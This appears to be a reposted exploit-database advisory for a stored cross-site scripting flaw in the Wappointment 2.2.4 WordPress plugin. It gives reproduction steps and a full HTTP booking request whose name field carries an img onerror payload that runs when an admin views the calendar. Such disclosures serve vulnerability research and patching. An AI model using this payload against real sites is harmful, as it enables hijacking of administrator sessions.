wordpress plugin wappointment 2.2.4 stored crosssite scripting (xss)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability Code...
 Code...
				
# Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS) # Date: 2021-07-31 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip # Version: 2.2.4 # Tested on: Windows # Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page # 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype) # 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname"><img src=x onerror=prompt(1)> # 4) Click Confirm # 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar ) # Post Request (Step 4): POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1 Host: domain.com Content-Length: 205 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Content-Type: application/json Origin: http://domain.com Referer: http://domain.com/wordpress/booking-page/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close {"email":"testemail@testemail.com","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}
Wordpress plugin wappointment 2.2.4 stored crosssite scripting (xss) Vulnerability / Exploit Source : Wordpress plugin wappointment 2.2.4 stored crosssite scripting (xss)
 
 
	 Register
Register Easy integrations and simple setup help you start scanning in just some minutes
					Easy integrations and simple setup help you start scanning in just some minutes